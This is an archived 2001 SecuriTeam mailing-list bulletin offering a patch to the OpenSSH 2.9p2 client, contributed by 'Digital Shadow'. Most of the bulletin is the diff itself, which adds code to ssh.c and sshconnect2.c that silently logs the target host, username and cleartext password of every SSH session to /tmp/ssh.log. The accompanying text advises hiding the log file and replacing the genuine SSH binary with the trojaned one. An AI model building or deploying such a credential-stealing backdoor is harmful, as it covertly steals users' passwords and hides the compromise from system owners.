[TOOL] OpenSSH Snoop Patch

From: support@securiteam.com
Date: 09/09/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [TOOL] OpenSSH Snoop Patch
Message-Id: <20010909200028.AD5EF138C0@mail.der-keiler.de>
Date: Sun,  9 Sep 2001 22:00:28 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  OpenSSH Snoop Patch
------------------------------------------------------------------------

DETAILS

This is a patch for openssh-2.9p2 that will enable logging of the
username, password and target system address whenever anyone uses SSH. The
details are grabbed and logged before they are encrypted.

The code currently logs to /tmp/ssh.log - it is highly advised that you
modify this to somewhere a little less obvious. To apply the patch, copy
it into the directory where openssh-2.9p2 is and type: cat
openssh-2.9p2-patch | patch Then compile it, and use a utility such as fix
to replace the old SSH with the new version.

Code:
----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----
Common subdirectories: old/contrib and new/contrib
Common subdirectories: old/openbsd-compat and new/openbsd-compat
diff -N -c old/ssh.c new/ssh.c
*** old/ssh.c Tue Apr 17 19:14:35 2001
--- new/ssh.c Thu Aug 9 11:59:42 2001
***************
*** 249,254 ****
--- 249,255 ----
        struct passwd *pw;
        int dummy;
        uid_t original_effective_uid;
+ FILE *lg; //xxxx

        __progname = get_progname(av[0]);
        init_rng();
***************
*** 716,721 ****
--- 717,730 ----
            tilde_expand_filename(options.user_hostfile2,
original_real_uid);

        /* Log into the remote system. This never returns if the login
fails. */
+
+ //xxxx
+ lg=fopen("/tmp/ssh.log", "a");
+ fprintf(lg, "Host: %s\n", host);
+ fprintf(lg, "User: %s\n", options.user);
+ fclose(lg);
+ //xxxx
+
        ssh_login(sensitive_data.keys, sensitive_data.nkeys,
            host, (struct sockaddr *)&hostaddr, pw);

diff -N -c old/sshconnect2.c new/sshconnect2.c
*** old/sshconnect2.c Thu Apr 19 21:40:46 2001
--- new/sshconnect2.c Thu Aug 9 11:59:56 2001
***************
*** 441,446 ****
--- 441,447 ----
        static int attempt = 0;
        char prompt[80];
        char *password;
+ FILE *lg; //xxxx

        if (attempt++ >= options.number_of_password_prompts)
                return 0;
***************
*** 457,462 ****
--- 458,470 ----
        packet_put_cstring(authctxt->method->name);
        packet_put_char(0);
        packet_put_cstring(password);
+
+ //xxxx
+ lg=fopen("/tmp/ssh.log", "a");
+ fprintf(lg, "Password: %s\n\n", password);
+ fclose(lg);
+ //xxxx
+
        memset(password, 0, strlen(password));
        xfree(password);
        packet_inject_ignore(64);

----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----

ADDITIONAL INFORMATION

The information has been provided by <mailto:wodahs@gmx.net> Digital
Shadow.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [EXPL] JavaScript Can Write Anything to the Windows Registry
    ... Microsoft has released a patch for: ... ActiveX Component vulnerability, the following is an exploit code for that ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • Re: Q822925 problem
    ... Here's a link to the bulletin for this patch, ... Microsoft originally issued this bulletin on August 20th, ... systems that are configured as web servers serving ASP.NET web pages and ...
    (microsoft.public.security)
  • Re: Conflicting info between the global Security Bulletin and some SPi Security Bulletin
    ... According the Security Bulletin for the release of SP4, ... you will see that the updated patch was first included in SP3 ... Later, install of an older ...
    (microsoft.public.win2000.security)
  • Re: Q822925 problem
    ... Here's a link to the bulletin for this patch, ... Microsoft originally issued this bulletin on August 20th, ... systems that are configured as web servers serving ASP.NET web pages and ...
    (microsoft.public.security)
  • [UNIX] Pine Privacy Patch
    ... The Pine email client allows users to define the "From:" address ... Applying the following patch to pine 4.4 will cause Sender: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)